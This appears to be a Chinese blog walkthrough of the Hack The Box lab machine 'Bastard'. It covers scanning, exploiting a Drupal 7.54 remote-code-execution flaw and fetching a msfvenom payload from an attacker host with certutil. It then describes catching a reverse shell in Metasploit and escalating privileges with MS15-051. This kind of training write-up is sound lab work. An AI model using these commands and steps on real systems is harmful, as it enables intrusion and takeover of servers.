HTB靶场记录之Bastard

 

 

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

相关文章>>

HTB靶场记录之Jarvis

HTB靶场记录之SolidState

HTB靶场记录之Arctic

HTB靶场记录之OpenAdmin

HTB靶场记录之Popcorn

HTB靶场记录之Europa

HTB靶场记录之Cronos

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。

HTB靶场记录之Cronos

 1、靶机介绍

这次的靶机是Bastard。

HTB靶场记录之Bastard

 

2、信息收集

由于autorecon的速度比较慢,这里直接nmap -sC(默认脚本) -sS(快速扫描)过一下,80端口有个Drupal 7的标题,Drupal是个CMS具体的版本信息可以查看/CHANGELOG.txt。

HTB靶场记录之Bastard

 

首先确保这个80端口能正常访问

HTB靶场记录之Bastard

 

其次我们跟进一下可以看到版本为7.54

HTB靶场记录之Bastard

 

3、搜索payload,getshell前的准备

首先我们肯定是用searchsploit查看漏洞版本信息,而版本为7.54的话最好使用Drupal 7.x Module Services -RemoteCode Execution,这个通杀漏洞,不过这个我使用失败了。

HTB靶场记录之Bastard

 

这里上网找了一下有一个相关的Drupal的RCE漏洞的CVE编号,并且有很多不同的payload。

HTB靶场记录之Bastard

 

在github上找了一下下载链接在附件,或者是直接上GitHub上漏洞编号就行了。

看了一下是python3的格式,并需要安装好以下的库才能顺利执行。

HTB靶场记录之Bastard

 

4、getshell进行中

此时直接一个python 文件名 -cwhoami成功执行。

HTB靶场记录之Bastard

 

或者是dir可列出当前目录下的文件名,并指导当前目录为C:\inetpub\drupal-7.54。

HTB靶场记录之Bastard

 

那目前的想法是创建一个新目录,然后生成恶意文件传上去一个运行接收shell回来(建议最好创建一个文件夹,用powershell 的远程传文件python表示传输成功,但不知道把文件传到哪了)。首先使用mkdir创建一个cunfang文件夹先:

HTB靶场记录之Bastard

 

关于传文件这里在网上找了一下,还有一个CertUtil.exe的内置程序方便点,格式为: certutil.exe -urlcache -split -f http://ip:端口/文件名。

HTB靶场记录之Bastard

 

此时顺便用msfVENOM生成一个.exe的马

HTB靶场记录之Bastard

 

用刚才的payload用certutil.exe-urlcache -split -f
http://10.10.14.5:8080/makabaka.exe把文件传上去(这里的ip是开了python共享模式的kali IP)

HTB靶场记录之Bastard

 

此时打开我们的MSF使用exploit/multi/handler经典模块,设置好kali的IP和端口顺便把payload设置为
windows/x64/shell/reverse_tcp以后使用run开始监听。

HTB靶场记录之Bastard

 

此时用回payload 远程执行,如上图所示直接接收shell成功。

HTB靶场记录之Bastard

 

这里拿到user的flag

HTB靶场记录之Bastard

 

5、提权

提权我打算用MSF的自带提权payload,然而连脚本也可以区分欧皇和非酋了。

这里我为了多一个shell控制以防卡死再生成一个shell。

HTB靶场记录之Bastard

 

用上面的方法添加多一个shell出来,出现meterpreter就是代表成功。

HTB靶场记录之Bastard

 

先使用background退出去,注意看session,然后使用
post/multi/recon/local_exploit_suggester模块,设置好session以后run,跟大佬一起做。

他是30个exploit check,我是20个还顺便对比了一下他扫的东西比我多。

再扫一次MSF直接崩了。

HTB靶场记录之Bastard

 

无果可以根据systeminfo可知,这是windows 2008 R2,可以使用大杀器MS15-051针对Windows Server 2008 R2。

可以理解为49298大杀器通杀之前的靶机。

HTB靶场记录之Bastard

 

这里要到github上搜一下下载,然后用同样的方法certutil.exe传上去。

HTB靶场记录之Bastard

 

此时一波.exe whoami执行成功。

但是,这时能变换最高权限只有在运行.exe +命令的情况下才行:

HTB靶场记录之Bastard

 

所以我把shell.exe之前生成的恶意文件拿出来,再用MSF监听。

HTB靶场记录之Bastard

 

此时,真正变为管理员能爬到管理员那里拿root的flag。

HTB靶场记录之Bastard

以上为今天分享的内容,小伙伴们看懂了吗? 

 

posted @ 2022-03-02 16:52  i春秋  阅读(245)  评论(0编辑  收藏  举报